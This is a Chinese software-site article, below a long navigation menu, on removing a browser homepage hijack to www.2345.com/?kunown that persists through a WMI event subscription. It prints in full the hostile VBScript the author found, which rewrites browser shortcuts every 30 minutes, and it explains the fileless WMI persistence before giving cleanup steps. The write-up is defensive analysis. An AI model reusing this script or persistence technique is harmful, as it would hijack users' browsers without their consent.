浏览器
双核浏览器
游戏浏览器
高速浏览器
视频浏览器
IE浏览器
浏览器周边
手机浏览器
安卓游戏
音乐舞蹈
养成游戏
儿童游戏
仙侠手游
角色扮演
策略塔防
休闲益智
动作冒险
飞行射击
模拟经营
体育运动
赛车竞速
网络游戏
安卓软件
资讯阅读
生活服务
影音播放
购物理财
效率办公
趣味娱乐
交通出行
学习教育
摄影图像
在线音乐
系统工具
网络购物
聊天工具
安全杀毒
图片编辑
新闻资讯
软件资讯
游戏资讯
手机教程
手游攻略
游戏攻略
软件教程
IE专区
安卓专题
文章合集
电脑软件专题
安全软件
杀毒软件
系统安全
加密解密
防火墙
远程控制
木马查杀
影音软件
网络电视
视频播放
音乐播放
视频制作
音频编辑
录音录像
教育学习
外语学习
教育管理
早教启蒙
在线课堂
成人教育
资格考试
聊天社交
即时通讯
视频聊天
在线交友
变声器
表情包
办公软件
线上会议
文档管理
行业管理
考勤打卡
应用工具
输入法
下载工具
时钟日历
记事本
文件管理
计算器
编程开发
编程工具
JAVA相关
加壳脱壳
编程控件
数据库
网页源码
软件开发
补丁制作
系统美化
桌面制作
壁纸大全
系统主题
屏幕保护
桌面辅助
系统软件
系统优化
备份还原
系统检测
U盘工具
磁盘工具
驱动补丁
图文处理
图片素材
图像处理
图片制作
图片压缩
电子相册
抓图工具
其他软件
电子书籍
模拟器
辅助工具
交通出行
手机管理
其他工具
素材下载
字体素材
PPT素材
专区
文章合集
软件
游戏
浏览器
安卓专题
软件
游戏
浏览器
IEfans/ IE专区/ IE相关 /IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法图文

IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法图文

2023-06-05 20:30:02 编辑:匿名

近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置均正常!

最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。

IE快捷方式的命令被修改为http://www.2345.com/?kunown

之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。

打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了),修改Win7下opera快速启动图标路径类似如下:

C:⁄Users⁄iefans⁄AppData⁄Roaming⁄Microsoft⁄Internet Explorer⁄Quick Launch⁄User Pinned⁄TaskBar⁄Opera12.01 1532.lnk

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入root⁄subscription(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:

打开 WMI event viewer 填入 root⁄subscription

点击左侧_EventFilter:Name=unown_filter,再至右侧右键点击ActiveScriptEventConsume r Name=unown,右键选择view instant properties,如下图:

选择view instant properties

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上http://www.2345.com/?kunown!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。

受到影响的浏览器有(各色浏览器,差不多齐了):

IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, SogouExplorer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe

具体代码如下:

On Error Resume Next:Const link = http://www.2345.com/?kunown:browsers = Array(IEXPLORE.EXE, chrome.exe, firefox.exe, 360chrome.exe, 360SE.exe, SogouExplorer.exe, opera.exe, Safari.exe, Maxthon.exe, TTraveler.exe, TheWorld.exe, baidubrowser.exe, liebao.exe, QQBrowser.exe):Set oDic = CreateObject(scripting.dictionary):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject(Scripting.Filesystemobject):Set WshShell = CreateObject(Wscript.Shell):strDesktop = C:⁄Users⁄Gemini⁄Desktop:strAllUsersDesktop = WshShell.SpecialFolders(AllUsersDesktop):QuickLaunch = C:⁄Users⁄Gemini⁄AppData⁄Roaming⁄Microsoft⁄Internet Explorer⁄Quick Launch:UserPinnedStartMenu = QuickLaunch ⁄User Pinned⁄StartMenu:UserPinnedTaskBar = QuickLaunch ⁄User Pinned⁄TaskBar:For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = lnk Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) . fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后,清除方法:在WMI event viewer中将_EventFilter:Name=unown_filter项目右键删除!

删不掉?

到WMITool安装路径(例如:C:⁄Program Files (x86)⁄WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

解决方法来自:Gemini

相关推荐

浏览器更新